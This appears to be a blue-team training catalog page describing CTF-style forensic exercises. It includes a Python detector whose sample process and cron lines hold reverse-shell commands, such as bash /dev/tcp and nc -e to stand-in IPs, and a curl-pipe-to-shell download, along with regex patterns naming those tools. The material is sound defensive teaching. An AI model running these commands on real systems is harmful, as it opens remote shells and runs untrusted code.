Practice Blue-team

Lessons, exercises, and projects about blue-team

Browse our curated database of projects, exercises, and lessons to learn blue-team skills

Reverse Engineering in Crime - Skills that Define the Defensive Analyst

An incident is not solved with commands, but with reasoning. This article explores the key skills every analyst must develop to face real attacks: from log analysis to binary interpretation, including persistence hunting, event correlation, and an investigative mindset.

This article takes you on a digital hunting mission where there is no malware or clear alerts, only subtle clues hidden in the data. You will learn to use Python to filter names, identify patterns, and apply conditional logic like a true forensic analyst. The goal: find an impostor among a list of identities, and decode a hidden base64 message. A lesson on how defense can also be an active search for the truth.

1 hr average

Analyze a .pcap file containing a suspicious HTTP transaction, find a Base64-encoded string, and decode the flag.

1 hr average

Analyze a seemingly anonymous photo to determine the city and country where it was taken. Use OSINT techniques to validate the flag.

1 hr average

A Linux server has been compromised and multiple hidden reverse shells were planted. Your job as an analyst is to detect and remove them.

1 hr average

Investigate a compromised website to detect a hidden reverse shell. Find the backdoor and validate your discovery.


This article immerses you in an Ubuntu server where nothing is as it seems. Your mission is to identify a malicious user acting from within, manipulating scheduled tasks and leaving traces in the system. You'll learn to navigate the file system, inspect processes, review firewall rules, and analyze cron jobs for suspicious activity. An experience that challenges both your technical knowledge and your deductive skills.
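The reverse-shell hunt and the cron-job review above both come down to the same move: read process command lines and scheduled tasks, match them against known reverse-shell and download-and-execute shapes, and then correlate the callback addresses across both sources so that a shell in `ps` whose address also appears in cron is recognised as persistence rather than a one-off. The following is an added example written for this page, not code from the exercises themselves; the `ps` and crontab lines, the hostnames and the IP addresses are all constructed here (RFC 5737 documentation ranges), and the indicator patterns are a starting set, not a complete detection ruleset.

```python
import re

# Constructed sample output (abridged `ps -eo user,pid,pcpu,pmem,args` and
# system crontab lines). These are made up for this example and are not
# taken from the exercise's server.
SAMPLE_PS = [
    "root       612  0.0  0.1 /usr/sbin/cron -f",
    "www-data  1337  0.0  0.2 bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
    "backup    2048  0.0  0.3 nc -e /bin/sh 198.51.100.7 9001",
    "postgres   900  0.1  1.0 postgres: checkpointer",
    'deploy    3100  0.0  0.4 python3 -c "import socket,subprocess,os;s=socket.socket()"',
]
SAMPLE_CRON = [
    "17 *  * * *  root    cd / && run-parts --report /etc/cron.hourly",
    "*/5 * * * *  backup  /bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'",
    "0 3  * * *  root    /usr/local/bin/backup.sh",
    "@reboot      deploy  curl -s http://203.0.113.5/p.sh | sh",
]

# Command-line shapes a defender recognises as reverse-shell or
# download-and-execute behaviour. Hypothetical starting set, not exhaustive.
INDICATORS = {
    "bash /dev/tcp reverse shell": re.compile(r"/dev/tcp/\S+/\d+"),
    "netcat with -e": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s"),
    "python socket+subprocess one-liner": re.compile(
        r"\bpython\d?(?:\.\d+)?\b.*-c.*socket.*subprocess"),
    "remote script piped to a shell": re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
    "mkfifo/telnet pipe shell": re.compile(r"\bmkfifo\b|\btelnet\b.*\|"),
}
# Callback endpoint as it appears in these payloads: "ip/port" (bash) or "ip port" (nc).
_REMOTE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})[/ ](\d{1,5})\b")


def scan(lines, source):
    """Return one finding per (line, indicator) match, with the callback
    endpoint extracted when the command line names one."""
    findings = []
    for line in lines:
        for name, rx in INDICATORS.items():
            if rx.search(line):
                m = _REMOTE.search(line)
                findings.append({
                    "source": source,
                    "indicator": name,
                    "remote": f"{m.group(1)}:{m.group(2)}" if m else None,
                    "line": line.strip(),
                })
    return findings


def correlate(*finding_lists):
    """Callback endpoints present in every source. A live shell in `ps`
    whose address is also scheduled in cron is persistence, not a one-off."""
    sets = [{f["remote"] for f in fl if f["remote"]} for fl in finding_lists]
    return set.intersection(*sets) if sets else set()


if __name__ == "__main__":
    ps_hits = scan(SAMPLE_PS, "ps")
    cron_hits = scan(SAMPLE_CRON, "cron")
    for f in ps_hits + cron_hits:
        print(f"[{f['source']}] {f['indicator']:<36} remote={f['remote']}  {f['line']}")
    print("persistent callbacks:", correlate(ps_hits, cron_hits))
```

On a real host the inputs would come from `ps -eo user,pid,pcpu,pmem,args`, `/etc/crontab`, `/etc/cron.d/*` and each user's `crontab -l`; matching on command lines alone misses a shell that was renamed or started through a wrapper, so treat a clean scan as one data point and still cross-check listening and established sockets.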

In this article, you dive into the art of reading code as a tool for cyber defense. It's not just about finding errors, but about detecting subtle alterations that could indicate an attack. You will learn the fundamentals of Python, understand how attackers manipulate scripts, and train your mind to restore the original intent of the code. This is an exercise in analysis, logic, and active listening: code also speaks, if you know how to read it.

1 hr average

You’ve recovered a suspicious string. Your goal is to decrypt it using a classic cipher method called Atbash and validate your result using a script. Only if you decrypt it correctly will you receive the final reward.
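The Atbash exercise above and the earlier pcap exercise (find a Base64 string in an HTTP transaction, decode the flag) share the same workflow: pull a candidate token out of captured data, apply the transform, and validate that the result is plausible before submitting it. The following is an added example written for this page, not code from the exercises; the ciphertext, the flag value and the HTTP request are constructed here, and the flag-shape check is a hypothetical heuristic rather than the exercises' own validator.

```python
import base64
import re
import string

# Constructed samples for this example; they are not the exercises' real artifacts.
SAMPLE_ATBASH = "GSV UOZT RH RM GSV OLTH"
SAMPLE_FLAG = "flag{constructed-sample-1234}"
SAMPLE_B64 = base64.b64encode(SAMPLE_FLAG.encode()).decode()
# A constructed HTTP POST carrying the token in a form field, roughly what a
# "follow TCP stream" view of the pcap would show.
SAMPLE_HTTP = (
    "POST /upload HTTP/1.1\r\n"
    "Host: intranet.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    f"user=svc_backup&note={SAMPLE_B64}\r\n"
)

# Atbash maps A<->Z, B<->Y, ... in both cases; everything else passes through.
_ATBASH_TABLE = str.maketrans(
    string.ascii_uppercase + string.ascii_lowercase,
    string.ascii_uppercase[::-1] + string.ascii_lowercase[::-1],
)


def atbash(text: str) -> str:
    """Apply Atbash. The cipher is an involution, so the same function
    both encrypts and decrypts."""
    return text.translate(_ATBASH_TABLE)


# Runs of base64-alphabet characters; 16+ keeps ordinary words out.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def find_base64_candidates(blob: str):
    """Return (token, decoded_text) for every run in `blob` that decodes
    cleanly (strict alphabet, padding repaired) to printable ASCII."""
    hits = []
    for m in _B64_TOKEN.finditer(blob):
        token = m.group(0)
        padded = token + "=" * ((-len(token)) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text.isprintable():
            hits.append((token, text))
    return hits


def looks_like_flag(text: str) -> bool:
    """Hypothetical plausibility check: CTF-style prefix{...} wrapper."""
    return re.fullmatch(r"[A-Za-z0-9_]+\{[^{}\s]+\}", text) is not None


if __name__ == "__main__":
    print("Atbash:", atbash(SAMPLE_ATBASH))
    for token, text in find_base64_candidates(SAMPLE_HTTP):
        print(f"{token} -> {text} (flag-shaped: {looks_like_flag(text)})")
```

Because Atbash is its own inverse, a quick self-check is `atbash(atbash(x)) == x`; for the pcap case, run `find_base64_candidates` over the reassembled stream rather than over individual packets, since a token split across segments will not decode.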

1 hr average

A user known as johnclick1337 posted a threat before disappearing. Use OSINT techniques to uncover his email and validate the flag.

2 hrs average

Face an internal sabotage that has taken down the main web service. Investigate, escalate privileges, and unmask the impostor to restore operability.

1 hr average

Analyze and repair a Python script sabotaged by an internal attacker to recover the original password. Once fixed, validate it and decode a flag using CyberChef.

Explore the world of Endpoint Detection and Response (EDR) systems, focusing on advanced threat detection and real-time response to safeguard modern businesses. Learn how EDR provides proactive protection, using monitoring, machine learning, and automation to detect and address security risks efficiently.

This article immerses you in a cyber defense challenge with a deeply human focus: rescuing a lost agent through clues hidden in code. You'll learn to deduce geographic information with Python, generate custom dictionaries, use Hydra to automate controlled attacks, and decode base64 messages. More than a technical exercise, it's a lesson in how cybersecurity also involves empathy, ingenuity, and commitment to those who trust us to protect them.

1 hr average

A Linux system has been compromised. Your mission is to investigate a suspicious image, track the attacker, and uncover hidden persistence tasks. Only by cleaning the system correctly will you be able to reconstruct the final flag.

1 hr average

You’ve received a suspicious executable. Your task is to decompile it, identify the malicious behavior, and clean the binary. Only by successfully removing the malicious activity will the program execute fully and reveal a message that contains the flag.

1 hr average

A critical database backup was found damaged. As an analyst, your task is to recover usable data and find the flag.

1 hr average

Analyze a vulnerable form in a fictional licensing site, identify the XSS vulnerability, and validate your finding with a script.

1 hr average

Analyze a suspicious script, deduce the criminal's name from clues, and decode a flag using CyberChef.